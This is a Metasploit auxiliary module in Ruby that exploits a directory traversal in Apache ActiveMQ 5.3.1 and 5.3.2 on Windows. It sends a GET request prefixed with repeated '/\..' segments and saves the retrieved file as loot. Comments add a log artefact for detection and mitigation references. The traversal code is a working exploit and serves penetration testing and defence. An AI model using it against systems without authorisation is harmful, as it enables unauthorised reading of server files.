Path: blob/master/modules/auxiliary/scanner/http/apache_activemq_traversal.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary scanner for the directory traversal in the Jetty ResourceHandler
# shipped with Apache ActiveMQ 5.3.1 and 5.3.2 on Windows (OSVDB 86401,
# AMQ-2788). For each host it sends one GET request and stores the response
# body locally as loot.
#
# Detection: the request path always begins with DEPTH repetitions of "/\..",
# followed by FILEPATH. That sequence in the HTTP access log of the ActiveMQ
# listener (port 8161 is the default used here) is the artefact to look for.
# Mitigation: the description names only 5.3.1 and 5.3.2 as affected; the
# AMQ-2788 reference tracks the vendor fix.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Registers the module metadata and its options.
  #
  # @param info [Hash] metadata supplied by the framework, merged through update_info
  def initialize(info = {})
    # Reliability, stability and side effects are declared as unknown below.
    # What run_host visibly does is issue a single GET per host and write the
    # result to the local loot store.
    metadata = update_info(
      info,
      'Name' => 'Apache ActiveMQ Directory Traversal',
      'Description' => %q{
        This module exploits a directory traversal vulnerability in Apache ActiveMQ
        5.3.1 and 5.3.2 on Windows systems. The vulnerability exists in the Jetty's
        ResourceHandler installed with the affected versions. This module has been tested
        successfully on ActiveMQ 5.3.1 and 5.3.2 over Windows 2003 SP2.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'AbdulAziz Hariri', # Vulnerability discovery
        'juan vazquez' # Metasploit module
      ],
      'References' => [
        [ 'OSVDB', '86401' ],
        [ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=895' ],
        [ 'URL', 'https://issues.apache.org/jira/browse/amq-2788' ]
      ],
      'Notes' => {
        'Reliability' => UNKNOWN_RELIABILITY,
        'Stability' => UNKNOWN_STABILITY,
        'SideEffects' => UNKNOWN_SIDE_EFFECTS
      }
    )
    super(metadata)

    # NOTE(review): the DEPTH help text refers to an "absolute" setting, but
    # this module registers no such option; DEPTH is always applied.
    module_options = [
      Opt::RPORT(8161),
      OptString.new('FILEPATH', [true, 'The name of the file to download', '/windows\\win.ini']),
      OptInt.new('DEPTH', [false, 'Traversal depth if absolute is set to false', 4])
    ]
    register_options(module_options)
  end

  # Checks one host: requests FILEPATH through the traversal prefix and, on
  # HTTP 200, saves the response body as loot.
  #
  # @param ip [String] address of the host being scanned, recorded with the loot
  # @return [void]
  def run_host(ip)
    wanted_file = datastore['FILEPATH']

    # Nothing to request without a file name.
    if wanted_file.nil? || wanted_file.empty?
      print_error("#{rhost}:#{rport} - Please supply FILEPATH")
      return
    end

    # DEPTH is registered with a default of 4; an unset value falls back to 1.
    depth = datastore['DEPTH'] || 1
    request_path = "/\\.." * depth
    # Add a separator only when FILEPATH does not already start with one.
    request_path << "/" unless ["\\", "/"].include?(wanted_file[0])
    request_path << wanted_file

    print_status("#{rhost}:#{rport} - Sending request...")
    request = {
      'uri' => request_path,
      'method' => 'GET',
    }
    response = send_request_cgi(request)

    # NOTE(review): success is decided on the status code alone and the body
    # is never inspected, so a server that answers 200 with an error or index
    # page is recorded as a hit. Confirm the stored loot before reporting.
    unless response && response.code == 200
      print_error("#{rhost}:#{rport} - Failed to retrieve file")
      return
    end

    loot_path = store_loot(
      'apache.activemq',
      'application/octet-stream',
      ip,
      response.body,
      File.basename(wanted_file)
    )
    print_status("#{rhost}:#{rport} - File saved in: #{loot_path}")
  end
end